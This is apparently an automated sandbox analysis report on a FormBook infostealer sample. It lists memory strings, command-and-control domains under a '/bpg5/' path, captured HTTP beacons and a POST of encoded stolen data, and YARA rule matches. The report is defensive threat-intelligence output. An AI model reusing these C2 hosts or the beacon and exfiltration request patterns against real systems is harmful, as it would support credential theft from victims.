          Source: 535276_86376.exe, 00000000.00000003.395423241.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.394806717.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.395858698.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.395306359.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.394287402.0000000005524000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.395605357.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.395232130.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.395760559.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.393650795.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.395130788.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.395686868.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.395028815.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.394954432.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.394695660.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.395494589.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.393980369.0000000005521000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.394478695.0000000005526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0fBy9k
          Source: 535276_86376.exe, 00000000.00000003.394287402.0000000005524000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.393320299.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.393650795.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.394695660.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.393980369.0000000005521000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.394478695.0000000005526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/_y
          Source: 535276_86376.exe, 00000000.00000003.394806717.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.394287402.0000000005524000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.395130788.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.395028815.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.394954432.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.394695660.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.394478695.0000000005526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/ey$ku
          Source: 535276_86376.exe, 00000000.00000003.393320299.0000000005525000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/iefBy9k
          Source: 535276_86376.exe, 00000000.00000003.395423241.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.394806717.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.396365512.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.395973257.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.395858698.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.395306359.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.395919860.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.394287402.0000000005524000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.396033838.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.396571400.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.395605357.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.395232130.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.395760559.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.396229155.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.393650795.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.395130788.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.395686868.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.395028815.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.394954432.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.394695660.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.395494589.0000000005527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: 535276_86376.exe, 00000000.00000003.394806717.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.395306359.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.394287402.0000000005524000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.395232130.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.395130788.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.395028815.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.394954432.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.394695660.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.393980369.0000000005521000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.394478695.0000000005526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/Iyk
          Source: 535276_86376.exe, 00000000.00000003.394287402.0000000005524000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.393320299.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.393650795.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.393980369.0000000005521000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.394478695.0000000005526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/ly/kt
          Source: 535276_86376.exe, 00000000.00000003.393320299.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.392915015.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.393650795.0000000005526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/o
          Source: 535276_86376.exe, 00000000.00000003.405375839.000000000555D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.monotype.
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.musicandgros.com
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.musicandgros.com/bpg5/
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.musicandgros.com/bpg5/www.musicandgros.comjdd=UX4BZm
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mysparexrewards.com
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mysparexrewards.com/bpg5/
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mysparexrewards.com/bpg5/www.mysparexrewards.comjdd=UX4BZm
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.perkibeans.com
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.perkibeans.com)B
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.perkibeans.com/bpg5/
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.perkibeans.com/bpg5/www.perkibeans.comjdd=UX4BZm
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rt66omm.com
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rt66omm.com/bpg5/
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rt66omm.com/bpg5/www.rt66omm.comjdd=UX4BZm
          Source: 535276_86376.exe, 00000000.00000002.427308556.0000000006622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: 535276_86376.exe, 00000000.00000003.389229423.000000000552B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comR
          Source: 535276_86376.exe, 00000000.00000003.389247365.000000000552B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com~
          Source: 535276_86376.exe, 00000000.00000002.427308556.0000000006622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: 535276_86376.exe, 00000000.00000003.394990933.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.comb2kt
          Source: 535276_86376.exe, 00000000.00000003.394954432.000000000552A000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.394806717.000000000552A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.comwc)k
          Source: 535276_86376.exe, 00000000.00000002.427308556.0000000006622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.techwithsun.com
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.techwithsun.com/bpg5/
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.techwithsun.com/bpg5/www.techwithsun.com
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thetowerbells.com
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thetowerbells.com/bpg5/
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thetowerbells.com/bpg5/www.thetowerbells.comjdd=UX4BZm
          Source: 535276_86376.exe, 00000000.00000002.427308556.0000000006622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: 535276_86376.exe, 00000000.00000002.427308556.0000000006622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: 535276_86376.exe, 00000000.00000002.427308556.0000000006622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vns96.net
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vns96.net/bpg5/
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vns96.net/bpg5/www.vns96.netjdd=UX4BZm
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wearecatalyst.app
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wearecatalyst.app/bpg5/
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wearecatalyst.app/bpg5/www.wearecatalyst.appjdd=UX4BZm
          Source: 535276_86376.exe, 00000000.00000002.427308556.0000000006622000.00000004.00000800.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.392270268.000000000552B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: explorer.exe, 00000006.00000002.668081280.0000000015A5C000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.antalyabfe.com/bpg5/?yDcF=xEB3NkPHNzUL428JzIcGE4FODNqN6Tn6BKvtS3
          Source: unknownHTTP traffic detected: POST /bpg5/ HTTP/1.1Host: www.musicandgros.comConnection: closeContent-Length: 1482Cache-Control: no-cacheOrigin: http://www.musicandgros.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.musicandgros.com/bpg5/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 79 44 63 46 3d 6a 4b 63 35 47 6b 6d 71 51 57 4a 65 6b 44 6d 6a 63 53 66 41 63 67 6e 32 66 71 36 44 6c 65 33 4f 74 7a 50 52 32 51 79 54 78 32 6f 72 32 35 62 70 30 43 59 42 35 72 53 5a 46 4e 68 65 6a 31 4a 6f 70 55 7a 30 56 76 6e 31 79 45 32 7a 67 4d 52 69 56 67 59 4c 42 46 53 6c 71 37 28 71 65 77 37 6b 50 6d 5a 52 32 51 35 39 7e 37 62 6f 58 79 62 78 4c 54 35 52 4c 37 72 4c 4d 56 6b 55 39 38 4e 4d 45 59 4a 36 7a 39 50 6f 67 57 38 54 55 50 72 47 70 6b 38 30 72 30 68 35 4e 54 46 4b 53 42 44 65 77 56 70 2d 7a 6b 62 75 34 6d 52 75 48 58 6f 42 61 74 41 6c 30 70 70 4d 50 33 30 42 32 5a 33 45 72 77 57 6d 6d 32 41 39 54 30 41 2d 7e 70 6a 53 55 68 28 4a 58 4c 4a 2d 62 54 4b 57 6a 43 4e 45 4c 78 7e 6b 6a 57 69 6b 45 64 6c 41 72 39 76 67 61 69 41 6e 45 30 59 70 68 45 65 72 58 70 32 6c 58 64 77 35 45 45 4e 53 4e 68 72 31 59 4c 74 6d 73 56 79 37 70 54 6f 59 52 34 37 43 79 41 31 54 45 32 6c 65 6c 4c 36 6d 44 78 73 44 74 49 4e 36 61 43 79 6e 69 54 66 53 39 38 35 31 43 7a 75 72 70 6b 79 6f 39 39 36 65 76 64 78 79 65 4a 37 58 35 4f 41 53 6a 5f 34 6e 4c 6c 35 45 55 62 63 76 47 32 44 4b 4e 48 7e 43 38 76 35 4f 52 36 74 58 30 42 30 79 63 4b 44 57 6b 4a 41 4c 71 77 50 57 6e 31 67 44 44 65 67 2d 76 53 67 4f 65 55 28 41 4b 67 42 56 4b 48 70 4f 64 5f 38 41 28 4f 56 6c 65 56 41 76 6e 32 33 30 54 4f 30 6c 52 51 6c 37 69 76 37 61 6e 36 35 79 6d 68 77 64 70 72 39 33 51 4e 33 34 32 75 54 39 37 50 50 5f 7e 41 53 33 57 73 4d 57 54 39 55 6c 52 75 6b 58 49 45 6a 4c 7e 57 73 49 68 73 43 51 4f 47 45 54 78 71 6c 44 4f 69 50 79 4c 37 64 32 4d 67 79 43 7a 5a 44 38 4a 39 63 76 68 36 73 65 36 42 74 6f 51 46 44 76 74 57 4b 73 74 74 33 78 39 38 49 58 49 35 59 36 45 51 79 47 72 33 61 65 42 64 41 6d 50 78 74 62 30 70 6c 4a 4d 4b 56 73 71 6c 61 42 75 6c 30 2d 73 47 54 33 79 2d 49 34 67 6c 79 6f 67 75 71 4f 34 54 6d 4f 42 48 66 4f 63 72 46 76 39 68 6d 31 71 30 39 78 4a 67 28 64 35 38 45 67 4d 62 61 37 4a 4f 71 6b 61 6c 74 72 43 42 78 59 42 4a 46 58 32 4d 65 67 4c 70 38 73 31 77 52 4e 28 4e 6c 53 71 44 39 63 6f 79 46 6b 47 33 37 33 55 52 4f 74 46 4d 4d 66 6d 4f 34 38 32 72 4a 76 68 6d 70 56 7e 66 50 71 7a 35 53 78 55 71 56 51 63 63 51 51 56 34 41 54 55 7a 62 62 4b 4a 6e 6b 4a 2d 77 59 7e 6e 68 49 32 2d 56 4b 49 61 50 30 48 4c 46 6b 36 6b 38 5a 48 4d 52 31 28 46 44 4e 38 37 6b 47 71 35 45 52 76 69 78 2d 6c 6d 50 6c 65 45 4c 7a 78 67 58 7a 7a 79 70 6a 43 68 72 46 53 68 49 38 70 30 4f 51 38 34 76 62 31 42 43 64 54 31 57 58 33 51 46 62 73 6a 51 63 4d 73 7a 73 73 4f 70 75 68 61 72 5f 4c 51 5a 44 68 76 50 54 51 75 70 4c 6f 6b 72 39 50 47 6e 58 56 63 65 75 34 48 7e 66 41 52 4f 6c 32 71 6e 76 31 5
          Source: unknownDNS traffic detected: queries for: www.berlinhealthweek.com
          Source: global trafficHTTP traffic detected: GET /bpg5/?yDcF=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2k5SHNZX0bjzo+VQ==&jdd=UX4BZm HTTP/1.1Host: www.berlinhealthweek.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bpg5/?yDcF=uI0ZFUbwVRIi3DiTUWHSZHrFFI2HorjHoi3n5y+9yD11xIHk/3oSwa67JMF5g0hIgFLJJ/T32HS+nao4IUwSdmK2gNTOclalNw==&jdd=UX4BZm HTTP/1.1Host: www.musicandgros.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bpg5/?yDcF=OwAgxHaVYkl+UI18XY1Iu2qsJ2+BnYEEJmaPOWExZbQGVS9XznV4LKZeojJXv/IuTBIyuONpXNM2+QSJdDCON7RUUDcju2gY5A==&jdd=UX4BZm HTTP/1.1Host: www.gomarketing.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bpg5/?yDcF=xEB3NkPHNzUL428JzIcGE4FODNqN6Tn6BKvtS3+/6Hi4oy4/NY/ls48/wyDTU/1Lw4jGnZUoaombkiQgI/8WWgszWIXmar603w==&jdd=UX4BZm HTTP/1.1Host: www.antalyabfe.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bpg5/?yDcF=WlLOtZde/S0Bb5podjoZPKpN16VixTIJ6XzrElaVf+c4mV5kUnhNlslOlX/mHpTHfJOtj0AP0RUV6kopxuheTeyylBQBjx3TTw==&jdd=UX4BZm HTTP/1.1Host: www.rt66omm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: 535276_86376.exe, 00000000.00000002.412124399.00000000007F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.535276_86376.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.535276_86376.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.653277973.0000000002D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.454267999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.653335998.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.454645936.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.653109156.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 3.2.535276_86376.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.535276_86376.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.535276_86376.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.535276_86376.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.653277973.0000000002D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.653277973.0000000002D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.454267999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.454267999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.653335998.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.653335998.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.454645936.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.454645936.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.653109156.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.653109156.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 535276_86376.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 3.2.535276_86376.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
